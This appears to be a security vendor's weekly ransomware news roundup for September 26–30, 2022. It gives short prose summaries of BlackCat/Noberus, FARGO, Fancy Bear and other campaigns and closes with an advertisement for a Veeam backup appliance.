Weekly Ransomware Roundup Sep 26 - 30, 2022

Noberus Ransomware Gets Upgraded - Targets Veeam Backup software

Coreid – the ransomware-as-a-service (RaaS) group behind the Noberus ransomware, aka BlackCat or ALPHV, has upgraded their malware to steal data and credentials from compromised networks. Noberus now uses an extensively updated version of the ‘Exmatter’ data exfiltration tool and ‘Eamfo’, an info-stealing malware. The updated version allows Exmatter to target more files while avoiding detection because it’s been extensively written. Eamfo uses SQL queries to steal credentials stored by Veeam backup software and allows hackers to gain access to critical systems. Read more

Stealthy Hackers Target Military and Weapons Contractors

Security researchers have discovered a new campaign targeting multiple military contractors involved in weapon manufacturing. The highly targeted attacks begin with a phishing email sent to employees, leading to a multi-stage infection involving many persistence and detection avoidance systems. The threat actor use a highly secure C2 infrastructure and multiple layers of obfuscation in the PowerShell stages. Analysts have not been able to attribute the campaign to any known threat actors, but have pointed some similarities with APT37 (Konni) group. Read more

American Airlines Breached Using Compromised MS Exchange Account

American Airlines was breached in a phishing campaign that used an employee's hacked Microsoft 365 account. The breach compromised personally identifiable information (PII) and medical information of both customers and employees. The attacker used an IMAP protocol to access mailboxes that synced their contents to another device. Once accessed, the hacker used these mailboxes to send phishing emails. The investigation revealed that the attacker further accessed multiple employees' accounts to send more phishing emails to target accounts. Read more

Hackers Use 'Mouseover' in PowerPoint files for Malware Deployment

The threat actor ‘Fancy Bear’ is targeting entities in the defense and government sectors of Europe using a new method that exploits mouse hover function in Microsoft PowerPoint documents to deploy malware. Once mouse is hovered over the hyperlink contained in the file, the code runs a PowerShell script that downloads and executes a dropper from OneDrive. The dropper then downloads another payload, known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads. Read more

8 Things You Can Do to Protect Your Endpoints from Ransomware

Ransomware search and exploit vulnerable endpoints in your enterprise network to exfiltrate your data and encrypt it. That is why you need to plan and execute your ransomware protection strategy carefully. Here is a list of 8 things you can do to protect your critical endpoints from ransomware attacks. Read more

Microsoft SQL servers hacked in TargetCompany ransomware attacks

Vulnerable Microsoft SQL servers are being targeted in a new wave of attacks with FARGO ransomware, security researchers are warning. The ransomware infection starts with the MS-SQL process on the compromised machine downloading a .NET file using cmd.exe and powershell.exe. The payload fetches additional malware (including the locker), generates and runs a BAT file that terminates specific processes and services. Additionally, the malware executes the recovery deactivation command and terminates database-related processes to make their contents available for encryption. Read more

210TB Fully Air-Gapped & Immutable Veeam Backup and DR appliance for $14,995

210TB Veeam Backup and DR appliance with Policy based Immutability using built-in Network & Power management Controllers and automated physical and logical Air-Gapped vault for $14,995.

Gen 10, 16-bay, 3U Rackmount unit with 15x14TB (210TB) Enterprise SAS drives, 10 core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For hardware details and demos, fill out the form on StoneFly website.?